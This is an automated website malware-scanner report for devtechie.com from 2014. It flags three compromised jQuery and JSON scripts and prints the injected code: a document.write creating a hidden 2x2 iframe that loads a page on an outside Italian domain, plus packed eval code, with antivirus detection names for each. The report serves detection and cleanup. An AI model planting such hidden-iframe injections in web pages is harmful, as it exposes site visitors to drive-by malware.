New scan:

Malware Scanner report for devtechie.com

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://devtechie.com/
200 OK
Content-Length: 68678
Content-Type: text/html
clean
http://devtechie.com/js.axd?path=Scripts%2fjquery.js
200 OK
Content-Length: 78757
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=644257></iframe>');

(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true
... 82000 bytes are skipped ...
ction(l){var k=c(this);k[d](e.call(this,l,k[d]()))});if(c.isWindow(f))return f.document.compatMode==="CSS1Compat"&&f.document.documentElement["client"+b]||f.document.body["client"+b];else if(f.nodeType===9)return Math.max(f.documentElement["client"+
b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window);

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://sannalegno.it/ewhd.html?j=644257

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sannalegno.it/ewhd.html?j=644257>

http://devtechie.com/js.axd?path=Scripts%2fjquery.cookie.js
200 OK
Content-Length: 4318
Content-Type: text/javascript
clean
http://devtechie.com/js.axd?path=Scripts%2fjquery.validate.min.js
200 OK
Content-Length: 25399
Content-Type: text/javascript
clean
http://devtechie.com/js.axd?path=Scripts%2fjquery-jtemplates.js
200 OK
Content-Length: 9732
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');


eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a(37.b&&!37.b.38){(9(b){6 m=9(s,A,f){5.1M=[];5.1u={};5.2p=E;5.1N={};5.1c={};5.f=b.1m({1Z:1f,3a:1O,2q:1f,2r:1f,3b:1O,3c:1O},
... 8856 bytes are skipped ...
if|ldelim|rdelim|Missing|unknown|tag|substr|amp|quot|hasOwnProperty|Array|Function|Functions|are|allowed|split|shift|__0|subtemplate|to|Operator|failed|MAX_VALUE|Math|ceil|root|Cannot|values|has|no|elements|setTemplateURL|setTemplateElement|trim|CDATA|hasTemplate|removeTemplate|processTemplateURL|GET|dataType|json|success|error|on_error|complete|on_complete|getJSON|setTimeout|browser|msie|document|processTemplateStart|createTemplateURL|processTemplateToText|jTemplatesDebugMode'.split('|'),0,{}))

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-ALS [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

http://devtechie.com/js.axd?path=Scripts%2fjson2.js
200 OK
Content-Length: 17356
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');









if (!this.JSON) {
this.JSON = {};
}

(function () {

function f(n) {
return n < 10 ? '0' + n : n;
}

if (typeof Date.prototype.toJSON !== 'function') {

Date.prototype.toJSON = function (key) {

return isFinite(this.valueOf()) ?
this.getUTCFullYear() + '-' +

... 7881 bytes are skipped ...
\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']').
replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {


j = eval('(' + text + ')');


return typeof reviver === 'function' ?
walk({ '': j }, '') : j;
}


throw new SyntaxError('JSON.parse');
};
}
} ());

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-AMJ [Trj]
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.Iframe.BZW
Emsisoft
Trojan.Iframe.BZW (B)
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
Fortinet
JS/Iframe.HH!tr
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

http://devtechie.com/Scripts/syntaxhighlighter/shCore.js
200 OK
Content-Length: 16190
Content-Type: application/javascript
clean
http://devtechie.com/Scripts/syntaxhighlighter/shBrushCSharp.js
200 OK
Content-Length: 2589
Content-Type: application/javascript
clean
http://devtechie.com/Scripts/syntaxhighlighter/shBrushCss.js
200 OK
Content-Length: 5783
Content-Type: application/javascript
clean
http://devtechie.com/Scripts/syntaxhighlighter/shBrushJScript.js
200 OK
Content-Length: 1697
Content-Type: application/javascript
clean
http://devtechie.com/Scripts/syntaxhighlighter/shBrushPlain.js
200 OK
Content-Length: 781
Content-Type: application/javascript
clean
http://devtechie.com/Scripts/syntaxhighlighter/shBrushSql.js
200 OK
Content-Length: 3116
Content-Type: application/javascript
clean
http://devtechie.com/Scripts/syntaxhighlighter/shBrushVb.js
200 OK
Content-Length: 2335
Content-Type: application/javascript
clean
http://devtechie.com/Scripts/syntaxhighlighter/shBrushXml.js
200 OK
Content-Length: 2065
Content-Type: application/javascript
clean
http://devtechie.com/js.axd?path=http%3a%2f%2fdevtechie.com%2fWebResource.axd%3fd%3dVjwlIqi7esLpp02YYsQj5vb-ws10arl6pmfvuDlShTmJbrmWkcW18HyiP3-g-C-LuV80Q3XQAy-AV4njmeyBLCbw27o1%26amp%3bt%3d635198732332401351
200 OK
Content-Length: 10087
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: devtechie.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 17 Apr 2014 14:33:25 GMT
Server: Microsoft-IIS/8.5
Content-Length: 68678
Content-Type: text/html; charset=utf-8
Content-Script-Type: text/javascript
Content-Style-Type: text/css
X-Powered-By: ASP.NET

...68678 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: devtechie.com
Referer: http://www.google.com/search?q=devtechie.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=devtechie.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://devtechie.com/

Result: devtechie.com is not infected or malware details are not published yet.